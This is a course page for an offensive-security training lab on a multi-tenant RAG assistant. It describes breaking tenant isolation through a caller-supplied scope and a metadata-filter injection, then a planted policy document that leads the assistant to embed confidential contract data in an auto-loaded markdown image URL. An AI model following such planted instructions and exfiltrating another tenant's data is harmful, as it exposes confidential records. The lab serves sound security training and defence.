PreporatoPreporato
Cross-Tenant Leakage: Break RAG Metadata Isolation and Exfiltrate Another Tenant's Contract
Hosted · ide
Beta

Cross-Tenant Leakage: Break RAG Metadata Isolation and Exfiltrate Another Tenant's Contract

Attack the multi-tenant isolation of a real Retrieval-Augmented Generation assistant. Two stacked bugs in one retriever, a caller-controlled tenant scope and a string-concatenated metadata filter, let a Globex-scoped caller read Initech's confidential contract from a Milvus + NVIDIA embeddings store. Chain the cross-tenant read into the EchoLeak markdown-image sink to exfiltrate the data to a listener, then harden the pipeline so isolation and the sink both hold.

70 min8 steps3 domainsAdvanced

Hands-on labs require Pro · $29.99/mo · cancel anytime

Map the attack surface
Query
Retriever
LLM
Poisoned doc
retrieved chunk
Answer
0%
Attack-success rate
Attacks blocked · benign answers pass
graded on real output, not the model's talk

What you'll learn

  1. 1
    Recon: confirm tenant isolation and find the two bugs
    DV-RAG-Support is multi-tenant. Every document carries a tenant in its
  2. 2
    Scope abuse: name another tenant in the request
    The first isolation bug is the simplest and the most common one in real systems:
  3. 3
    Filter injection: break out of the metadata predicate
    Bug 1 worked because the scope was caller-supplied. Suppose a developer "fixes" it
  4. 4
    Exfil chain: leak the cross-tenant value through the image sink
    Reading the contract is the access-control finding. The impact is getting it
  5. 5
    Harden 1: derive the tenant scope server-side
    Now switch sides and fix the bugs one at a time. The first and most load-bearing
  6. 6
    Harden 2: validate tenant values against an allow-list
    Server-side scope closed Bug 1. Bug 2 is separate: the metadata filter expr is
  7. 7
    Harden 3: allow-list the render sink
    The two isolation bugs are closed, but the exfil channel is still open as defense
  8. 8
    Verify: full regression battery against the hardened pipeline
    A fix only counts when you re-run every exploit against it and watch each one

Prerequisites

  • Comfortable reading Python
  • Know what an HTTP GET and a markdown image are
  • Familiarity with SQL injection helps but is not required

Exam domains covered

Offensive AI SecurityLLM Application SecurityMulti-Tenant Isolation

Skills & technologies you'll practice

This advanced-level ai/ml lab gives you real-world reps across:

RAGMulti-TenantIsolation BypassMetadata Filter InjectionBroken Access ControlOWASP LLM02AI Red Team

What you'll do in this lab

This is a hands-on offensive-security lab on multi-tenant RAG isolation. You attack DV-RAG-Support, a customer-support assistant backed by a Milvus vector store and NVIDIA nv-embedqa-e5-v5 embeddings, where documents are partitioned by tenant. Acting as a Globex-scoped caller, you exploit two stacked bugs in a single retriever: a caller-controlled tenant scope (broken access control, where the tenant comes from the request rather than the authenticated session) and a metadata filter built by raw string concatenation (the metadata-filter analogue of SQL injection).

Either bug lets you read Initech's confidential contract and its negotiated pricing. You then chain the cross-tenant read into the EchoLeak markdown-image channel: a planted public audit policy coaxes the assistant into echoing a confidential field into an image URL the client auto-loads, exfiltrating it to an in-pod listener. Finally you switch to defense and harden the pipeline: derive the tenant scope server-side, validate tenant values against an allow-list, and allow-list the render sink, all without breaking legitimate answers.

Frequently asked questions

Do I need a machine-learning background?

No. The core of this lab is access control, not model internals. You read a retriever, find two isolation bugs, and exploit them. The exfil step reuses a markdown-image side channel that needs only an understanding of HTTP GETs.

What is the metadata-filter injection bug?

The retriever builds its tenant filter by concatenating strings, so a tenant value carrying a quote and a boolean breaks out of the predicate, the same way an unparameterized SQL query is injectable. You craft such a value and collapse tenant isolation even when the scope is meant to be locked.

How is the cross-tenant exfiltration demonstrated?

You retrieve another tenant's confidential record, then chain it into the EchoLeak markdown-image sink: the assistant echoes a confidential identifier into an image URL that the client auto-loads, firing an HTTP request to an in-pod listener. The lab grades deterministically on the identifier reaching a loaded URL and the listener log.